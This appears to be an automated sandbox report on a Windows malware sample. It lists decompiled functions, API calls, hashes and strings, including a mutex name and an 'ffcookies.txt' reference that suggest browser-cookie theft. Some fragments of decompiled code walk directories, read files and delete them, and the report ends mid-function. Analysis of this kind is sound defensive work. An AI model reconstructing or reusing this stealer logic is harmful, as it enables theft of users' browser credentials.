Instruction ID: ef33778294753aa54e7f7d2c5df33d66e96767dbe31cdff2da17f2a52da10caf
Opcode Fuzzy Hash: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
Instruction Fuzzy Hash: DD21B071700115EBC714CBA9CD88E9FBBB9EF89704B2001ADF109EB291DA75ED41DB68

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406725 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 321stringCOMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
lstrlenW.KERNEL32 ref: 00406895
lstrlenW.KERNEL32(00000010), ref: 004068A0

Strings

`X_, xrefs: 004068C9, 00406927, 0040697F
., xrefs: 0040678F
\ffcookies.txt, xrefs: 004068CE

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocCombineFreeGlobalLocalPath
String ID: .$\ffcookies.txt$`X_
API String ID: 3891494632-672318526
Opcode ID: b5ff88a4fd32823ab2f7c5117cc0bf8385870352e73e6e1bd2351eb02142f846
Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
Opcode Fuzzy Hash: b5ff88a4fd32823ab2f7c5117cc0bf8385870352e73e6e1bd2351eb02142f846
Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004039D7 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 223
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* _v56;
				char _v608;
				signed char _v652;
				void* _t47;
				void* _t50;
				void* _t57;
				void* _t60;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				void* _t143;
				DWORD* _t144;
				void* _t145;
				void* _t149;

				_t101 = __ecx;
				_v24 = __edx;
				_v40 = __ecx;
				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
				_t129 =  *0x40e1d0; // 0x5f57c0
				_t143 = E0040A503(_t47, _t129);
				_v20 = _t143;
				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
				_v16 = _t50;
				if(_t50 != 0xffffffff) {
					_t144 = 0;
					do {
						if((_v652 & 0x00000010) != 0) {
							goto L11;
						} else {
							_push(L"..");
							_push( &_v608);
							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
								goto L11;
							} else {
								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
								_v36 = _t149;
								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t60 = E0040A69E( *0x40e044,  &_v8);
								_t102 = _v8;
								if(_t60 == 0) {
									L16:
									LocalFree(_t102);
									LocalFree(_t149);
									DeleteFileW(_t102);
								} else {
									_push(_t144);
									_push(_t102);
									_push(_t149);
									if( *((intOrPtr*)( *0x40e184))() == 0) {
										goto L16;
									} else {
										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
										_v32 = _t68;
										GetFileSize(_t68, _t144);
										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
										_t132 =  *0x40e1b4; // 0x60e678
										_t72 = E0040A503(_t71, _t132);
										_t133 =  *0x40e1b8; // 0x5f58e0
										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
										_t135 =  *0x40e1ec; // 0x5f57a0
										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
										_t137 =  *0x40e1ec; // 0x5f57a0
										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
										_t139 =  *0x40e1b8; // 0x5f58e0
										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
										_v12 = _t80;
										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
										_v28 = _t81;
										_t22 = _t81 + 0x40; // 0x40
										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
										_t84 = _v28;
										if(_t84 == 0) {
											LocalFree(_t145);
											LocalFree(_v8);
											goto L10;
										} else {
											_push(0);
											_push(0);
											_push(_t84);
											_push(_t145);
											_push(0xffffffff);
											_push(_v12);
											_push(0);
											_push(0xfde9);
											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
												LocalFree(_v12);
												LocalFree(_t145);
												LocalFree(_t102);
												LocalFree(_t149);
												LocalFree(_v8);
												break;
											} else {
												_v52 = _v32;
												_v56 = _t145;
												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
												_t126 = _a16;
												_v44 = _v44 & 0x00000000;
												_v48 = _t98;
												 *_t126 =  *_a16 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t149 = _v36;
												L10:
												LocalFree(_t102);
												LocalFree(_t149);
												_t101 = _v40;
												_t144 = 0;
												goto L11;
											}
										}
									}
								}
							}
						}
						L13:
						LocalFree(_v20);
						goto L14;
						L11:
						_push( &_v652);
						_push(_v16);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					FindClose(_v16);
					goto L13;
				}
				L14:
				return 0;
			}

0x004039ed
0x004039ef
0x004039f4
0x004039fd
0x00403a02
0x00403a15
0x00403a1d
0x00403a22
0x00403a24
0x00403a2a
0x00403a30
0x00403a32
0x00403a39
0x00000000
0x00403a3f
0x00403a4a
0x00403a4f
0x00403a54
0x00000000
0x00403a5a
0x00403a66
0x00403a7f
0x00403a88
0x00403a90
0x00403a93
0x00403a98
0x00403a9d
0x00403c78
0x00403c79
0x00403c80
0x00403c87
0x00403aa3
0x00403aa8
0x00403aa9
0x00403aaa
0x00403aaf
0x00000000
0x00403ab5
0x00403ac7
0x00403acb
0x00403ace
0x00403ae1
0x00403af0
0x00403af2
0x00403afa
0x00403aff
0x00403b11
0x00403b16
0x00403b28
0x00403b2d
0x00403b3f
0x00403b44
0x00403b59
0x00403b71
0x00403b74
0x00403b7c
0x00403b7f
0x00403b8d
0x00403b98
0x00403b9b
0x00403ba0
0x00403bfb
0x00403c04
0x00000000
0x00403ba2
0x00403baa
0x00403bab
0x00403bac
0x00403bad
0x00403bae
0x00403bb0
0x00403bb3
0x00403bb4
0x00403bbd
0x00403c52
0x00403c59
0x00403c60
0x00403c67
0x00403c70
0x00000000
0x00403bc3
0x00403bca
0x00403bd2
0x00403bd5
0x00403bd7
0x00403bdd
0x00403be1
0x00403bef
0x00403bf1
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf5
0x00403c0a
0x00403c0b
0x00403c12
0x00403c18
0x00403c1b
0x00000000
0x00403c1b
0x00403bbd
0x00403ba0
0x00403aaf
0x00403a9d
0x00403a54
0x00403c3f
0x00403c42
0x00000000
0x00403c1d
0x00403c28
0x00403c29
0x00403c2e
0x00403c39
0x00000000
0x00403c39
0x00403c4a
0x00403c4e

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
LocalFree.KERNEL32(00000000), ref: 00403BFB
LocalFree.KERNEL32(?), ref: 00403C04
LocalFree.KERNEL32(?), ref: 00403C0B
LocalFree.KERNEL32(00000000), ref: 00403C12
FindClose.KERNEL32(00000002), ref: 00403C39
LocalFree.KERNEL32(00000002), ref: 00403C42
LocalFree.KERNEL32(?), ref: 00403C52
LocalFree.KERNEL32(00000000), ref: 00403C59
LocalFree.KERNEL32(?), ref: 00403C60
LocalFree.KERNEL32(00000000), ref: 00403C67
LocalFree.KERNEL32(?), ref: 00403C70
LocalFree.KERNEL32(?), ref: 00403C79
LocalFree.KERNEL32(00000000), ref: 00403C80
DeleteFileW.KERNEL32(?), ref: 00403C87

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Strings

x`, xrefs: 00403AF2
X_, xrefs: 00403AFF, 00403B44

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Filelstrlen$AllocCloseDeleteFindGlobalSize
String ID: x`$X_
API String ID: 2451396805-2408541153
Opcode ID: c8e40ee989328082f4ec181681818df1f0188733713bec957370c48728c5672e
Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
Opcode Fuzzy Hash: c8e40ee989328082f4ec181681818df1f0188733713bec957370c48728c5672e
Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409064 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409064(void* __eflags, intOrPtr* _a4) {
				void* _t13;
				void* _t17;
				intOrPtr* _t19;

				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
				wsprintfW(_t17,  *0x40e47c, _t13);
				_t19 = _a4;
				 *_t19 = E0040A503( *_t19, _t17);
				LocalFree(_t13);
				LocalFree(_t17);
				return 1;
			}

0x0040907e
0x0040908f
0x004090a3
0x004090ad
0x004090b3
0x004090c3
0x004090c5
0x004090cc
0x004090d9

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
wsprintfW.USER32 ref: 004090AD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocDefaultGlobalInfoLocaleUserwsprintf
String ID:
API String ID: 539592093-0
Opcode ID: 22a266d555c1192314fdb5c0f38cd91d3bae16063c7bdcc2463245496e89e1a7
Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
Opcode Fuzzy Hash: 22a266d555c1192314fdb5c0f38cd91d3bae16063c7bdcc2463245496e89e1a7
Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D

Uniqueness

Uniqueness Score: -1.00%

Function 00406468 Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
LocalFree.KERNEL32(00000000), ref: 00406575
LocalFree.KERNEL32(?), ref: 004065CA

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
String ID:
API String ID: 565018292-0
Opcode ID: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
Opcode Fuzzy Hash: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040177F Relevance: 4.6, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(?,00000000), ref: 004017DB
LocalFree.KERNEL32(00000000), ref: 004017E2
LocalFree.KERNEL32(00000000), ref: 004017ED

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
Instruction ID: 0e35f1b792878b3a1d48bea3d62df56abb982cd26097e817133252b33d58790c
Opcode Fuzzy Hash: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
Instruction Fuzzy Hash: 5D01DF72200115FBEB188BAAED84FAB77ACEF48350F000434F605F72A0DAB0DD1096B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1FE Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

iqroq5112542785672901323, xrefs: 0040A20C

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID: iqroq5112542785672901323
API String ID: 0-2937663778
Opcode ID: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
Instruction ID: dfc9d6c5e4fbc171aed8fd1b755dd2b3d2cfba8e4e0761005cd4e136b75d37ee
Opcode Fuzzy Hash: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
Instruction Fuzzy Hash: D0E06D315012256AE724D7F5EC49FAA77AC9B09214F1000A5E915E6380EAB4EE148AAA

Uniqueness

Uniqueness Score: -1.00%

Function 004017FA Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
Instruction ID: 395fbee96700efcf13294783634cb000bafa4e7164606bd30abd8be72a67e938
Opcode Fuzzy Hash: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
Instruction Fuzzy Hash: 79014472201121BFD7259B9BDC49E9B7FACEF4A7A0B000035F608E7350D6709D10C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 02080D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 62ef794621d5ea3b2d77e87dd9d73198f7d5adc64546af18e458383c1f14b76b
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C701F272A107008FDF22EF20C805BAB33E6FB86316F0540A4D94A97281E770A8498B80

Uniqueness

Uniqueness Score: -1.00%

Function 020879D6 Relevance: 72.1, APIs: 31, Strings: 10, Instructions: 395synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02081272: LoadLibraryW.KERNEL32(0040C040), ref: 0208127D
Part of subcall function 02081272: LoadLibraryW.KERNEL32(0040C114), ref: 02081311

CoInitialize.OLE32(00000000), ref: 020879EA

Part of subcall function 0208A729: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 0208A758

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 02087A55
ExitProcess.KERNEL32 ref: 02087A5F
LocalFree.KERNEL32(00000000), ref: 02087B64
LocalFree.KERNEL32(00000000), ref: 02087B6B
LocalFree.KERNEL32(00000000), ref: 02087B72
LocalFree.KERNEL32(00000000), ref: 02087BDD
LocalFree.KERNEL32(00000000), ref: 02087BE8
LocalFree.KERNEL32(00000000), ref: 02087C07
LocalFree.KERNEL32(?), ref: 02087C10
LocalFree.KERNEL32(?), ref: 02087C19
ExitProcess.KERNEL32 ref: 02087C68
ExitProcess.KERNEL32 ref: 02087C9E

Strings

iqroq5112542785672901323, xrefs: 02087A40, 02087A45, 02087A52
@W_, xrefs: 02087CD4, 02087D08
H`, xrefs: 02087CE1
, xrefs: 02087A8A
, xrefs: 02087AA9
xWa, xrefs: 02087ABC
, xrefs: 02087A96
`X_, xrefs: 02087D51
, xrefs: 02087A7E
76426c3f362f5a47a469f0e9d8bc3eef, xrefs: 020879F0

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$ExitProcess$LibraryLoad$ByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $76426c3f362f5a47a469f0e9d8bc3eef$@W_$H`$`X_$iqroq5112542785672901323$xWa
API String ID: 1864685469-1493457711
Opcode ID: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction ID: 84c63b81e34857e8123961c18b9e3473dac8d4053751932dcfbf1f9b1a29efce
Opcode Fuzzy Hash: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction Fuzzy Hash: ABD1C475A003109BDB05BBB1DE58AAF77B6EF48300F104839E545B73A0DF749D119B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C17E Relevance: 66.9, APIs: 30, Strings: 8, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 0041C1C2
_wcscat_s.LIBCMTD ref: 0041C3DA

Part of subcall function 00429010: __errno.LIBCMTD ref: 00429064

__invoke_watson_if_error.LIBCMTD ref: 0041C3E3
_wcscat_s.LIBCMTD ref: 0041C412

Part of subcall function 00429010: _memset.LIBCMT ref: 004290EB
Part of subcall function 00429010: __errno.LIBCMTD ref: 00429129

__invoke_watson_if_error.LIBCMTD ref: 0041C41B
__errno.LIBCMTD ref: 0041C437

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

__errno.LIBCMTD ref: 0041C444
__errno.LIBCMTD ref: 0041C4A5
__invoke_watson_if_oneof.LIBCMTD ref: 0041C4AD
__errno.LIBCMTD ref: 0041C4B5
_wcscpy_s.LIBCMTD ref: 0041C4F2
__invoke_watson_if_error.LIBCMTD ref: 0041C4FB
__invoke_watson_if_oneof.LIBCMTD ref: 0041C59E
_wcscpy_s.LIBCMTD ref: 0041C5D6
__invoke_watson_if_error.LIBCMTD ref: 0041C5DF
__itow_s.LIBCMTD ref: 0041C1B9

Part of subcall function 0042B800: _xtow_s@20.LIBCMTD ref: 0042B82B

__errno.LIBCMTD ref: 0041C248
__errno.LIBCMTD ref: 0041C255
__strftime_l.LIBCMTD ref: 0041C279
__errno.LIBCMTD ref: 0041C2AA
__invoke_watson_if_oneof.LIBCMTD ref: 0041C2B2
__errno.LIBCMTD ref: 0041C2BA
_wcscpy_s.LIBCMTD ref: 0041C2F7
__invoke_watson_if_error.LIBCMTD ref: 0041C300
_wcscpy_s.LIBCMTD ref: 0041C353
__invoke_watson_if_error.LIBCMTD ref: 0041C35C
_wcscat_s.LIBCMTD ref: 0041C38D
__invoke_watson_if_error.LIBCMTD ref: 0041C396

Strings

,^@, xrefs: 0041C340, 0041C346
hHY@, xrefs: 0041C584
t9j, xrefs: 0041C805
_@, xrefs: 0041C1F0, 0041C1F6
RL, xrefs: 0041C56E
h ]@, xrefs: 0041C375
hHY@, xrefs: 0041C36B
t8j, xrefs: 0041C5AD

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__getptd_noexit__itow_s__strftime_l_memset_xtow_s@20
String ID: _@$,^@$RL$h ]@$hHY@$hHY@$t8j$t9j
API String ID: 154763593-3339620195
Opcode ID: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
Instruction ID: 3eb14a9a913676cf952d3c5baa468fbbeb682016143a5da59d3750aa6422998d
Opcode Fuzzy Hash: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
Instruction Fuzzy Hash: C60271B4A80714AADB20DF50DC86FDF7374AB14746F1041AAF608B62C1D7BC9A94CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0208581D Relevance: 49.2, APIs: 39, Instructions: 476COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 02085DB5

Part of subcall function 0208A64B: LocalFree.KERNEL32(00000000,?,02083FAD,00000002,?), ref: 0208A6B0

LocalFree.KERNEL32(00000000), ref: 02085C13
LocalFree.KERNEL32(?), ref: 02085C1C
LocalFree.KERNEL32(?), ref: 02085C25
LocalFree.KERNEL32(?), ref: 02085C2C
LocalFree.KERNEL32(00000000), ref: 02085C36
LocalFree.KERNEL32(?), ref: 02085C3F
LocalFree.KERNEL32(?), ref: 02085C48
LocalFree.KERNEL32(?), ref: 02085C51
LocalFree.KERNEL32(?), ref: 02085C5A
LocalFree.KERNEL32(?), ref: 02085C63
LocalFree.KERNEL32(?), ref: 02085C6C
LocalFree.KERNEL32(?), ref: 02085C75
LocalFree.KERNEL32(?), ref: 02085C7E

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(?), ref: 02085CA7
LocalFree.KERNEL32(?), ref: 02085CB0
LocalFree.KERNEL32(?), ref: 02085CB9
LocalFree.KERNEL32(?), ref: 02085CC2
LocalFree.KERNEL32(?), ref: 02085CCB
LocalFree.KERNEL32(?), ref: 02085CD4
LocalFree.KERNEL32(?), ref: 02085CDD
LocalFree.KERNEL32(?), ref: 02085CEC
LocalFree.KERNEL32(?), ref: 02085CF5
LocalFree.KERNEL32(?), ref: 02085CFE
LocalFree.KERNEL32(?), ref: 02085D07
LocalFree.KERNEL32(?), ref: 02085D10
LocalFree.KERNEL32(?), ref: 02085D17
LocalFree.KERNEL32(?), ref: 02085D28
LocalFree.KERNEL32(?), ref: 02085D31
LocalFree.KERNEL32(?), ref: 02085D3A
LocalFree.KERNEL32(?), ref: 02085D43
LocalFree.KERNEL32(?), ref: 02085D4C
LocalFree.KERNEL32(?), ref: 02085D5A
LocalFree.KERNEL32(?), ref: 02085D63
LocalFree.KERNEL32(?), ref: 02085D6C
LocalFree.KERNEL32(?), ref: 02085D7D
LocalFree.KERNEL32(?), ref: 02085D86
LocalFree.KERNEL32(00000000), ref: 02085D8D
LocalFree.KERNEL32(?), ref: 02085D9E

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$Global
String ID:
API String ID: 67877634-0
Opcode ID: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction ID: 64904d2b0e4706b72ea80cc74f6adab7557c29d15b3ba454445df218187d7e1b
Opcode Fuzzy Hash: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
Instruction Fuzzy Hash: A4F1E672901225EFDB15ABA6DE48DAEBFB5EF48310F044424F905B72A0DB706D21DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00406D26 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 419
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* _v92;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t132;
				intOrPtr* _t133;
				void* _t140;
				void* _t142;
				char* _t144;
				void* _t146;
				void* _t147;
				void* _t160;
				int _t163;
				void* _t165;
				signed int _t167;
				void* _t190;
				void* _t191;
				void* _t196;
				void* _t209;
				void* _t210;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t228;
				void* _t240;
				signed int _t241;
				void* _t264;
				intOrPtr _t265;
				void* _t267;
				void* _t270;
				void* _t271;
				intOrPtr _t273;
				intOrPtr* _t276;
				void* _t278;

				_v88 = __edx;
				_v84 = __ecx;
				if(_a8 == 0) {
					L50:
					return 0;
				}
				_t104 =  *0x40e38c; // 0x615570
				_v76 = _v76 & 0x00000000;
				_v48 = _t104;
				_t105 =  *0x40e380; // 0x615450
				_v80 = _t105;
				_t106 =  *0x40e2cc; // 0x5f58a0
				_v52 = _t106;
				_t107 =  *0x40e320; // 0x5f56a0
				_v56 = _t107;
				_t108 =  *0x40e384; // 0x615330
				_v64 = _t108;
				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v36 = _t111;
